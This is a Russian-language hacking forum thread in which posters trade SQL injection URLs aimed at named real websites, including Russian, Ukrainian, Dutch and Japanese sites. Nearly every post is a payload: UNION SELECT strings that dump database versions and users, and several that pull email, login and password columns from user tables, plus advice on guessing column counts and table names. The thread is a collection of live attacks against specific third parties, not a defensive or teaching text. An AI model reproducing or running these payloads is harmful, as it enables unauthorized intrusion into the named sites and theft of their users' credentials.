SQL Инъекции

www.promtractor.ru

Трахторской заводег

Code:

http://www.promtractor.ru/products_show.php?section=-1+union+select+1,2,version(),4/*

 

HTML:

http://loveradio.ru/ru/vote.shtml?vote_question_id=27%20AND%201=0

HTML:

http://loveradio.ru/ru/vote.shtml?vote_question_id=27'

HTML:

http://loveradio.ru/ru/main/forum/forum.shtml?fid=5'

HTML:

http://loveradio.ru/ru/main/forum/forum.shtml?fid=5%20and%201=0

HTML:

http://loveradio.ru/ru/main/horoscope/index.shtml?sign=aries'

 

http://www.ecruins.com/bands.php?ID=21+order+by+1

 

www.c82.net

Code:

http://www.c82.net/article.php?ID=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4/*

 

нашол инэекцыю на
http://www.eightrent.co.jp/shop/?id=-18+ORDER+BY+7--
подобрал столбец, а когда делаю
http://www.eightrent.co.jp/shop/?id=-18+UNION+SELECT+1,2,3,4,5,6,7
ошыбка....(

 

вавава

 

уже говорил тебе - что когда применяеш order by ненужно ставить несуществующий id

 

www.know-house.ru

Code:

http://www.know-house.ru/card_firm.php?n_id=102'+union+select+1,2,user(),4,5,6,7+user/*

 

немогу подобрать таблици =(

http://privet.zp.ua/anketa.php3?part=1&id=-4708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

 

Code:

http://5mag.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,concat(email,char(58),pwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users+limit+1,1/*

 

Snap >>
http://privet.zp.ua/part4.php3?catid=1'

мож здесь найдьош!)))

 

думаешь, скрипты разные базы юзают? о_0
ps: automatization.ru

Code:

http://www.automatization.ru/equip-db/device.php?id=-1+union+select+1,2,3,4,5,concat(login,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+user+limit+0,1/*

 

vechirka.kiev.ua

Code:

http://vechirka.kiev.ua/article.php?id_article=-1+union+select+1,concat(user(),char(58),database(),char(58),version()),3,4+user/*

 

Code:

http://wc2006.sport.com.ua/teams.phtml?id_team=-6+union+select+concat(password,0x3a,username)+from+users/*

 

База то одна только вот занвание таблиц подобрать не могу
http://privet.zp.ua/anketa.php3?part=1&id=-4708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23/*

Поэтому толку нет мне кажеться из других мест биться

 

n1†R0x здесь маса вареантов он титулкы на главной до названия самого файла где призошла ошыбка... я имел виду в том что может быть какаято зацепка..) с всего етого

 

www.02.ru

Правоохранительный Портал

Code:

http://www.02.ru/news/index.php?id_tn=-1

Code:

http://www.02.ru/news/index.php?id_tn=8&id_n=668-1

Code:

http://www.02.ru/news/index.php?id_tn=8&id_n=667'

 

Ксандер
http://www.02.ru/news/index.php?id_tn=-2+union+select+1,2/*
просто вывода нет =)

 

Тоже это заметил, но думал это у меня глюкануло, значит нет=), даже конверт пробовал =))



p.s. в процесе

Code:

http://www.soaw.org/new/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

 

[shop]

Code:

http://www.loversandfriends.nl/shop.php?id=-56+union+select+1,2,3,user(),database(),6,7,8,9,version(),11,12,13,14,15,16/*

Code:

http://www.webdesign-freelance.nl/webdesign-freelance-shop.php?id=-15%20UNION%20SELECT%201,convert(user()+using+latin1),3,4,convert(version()+using+latin1)/*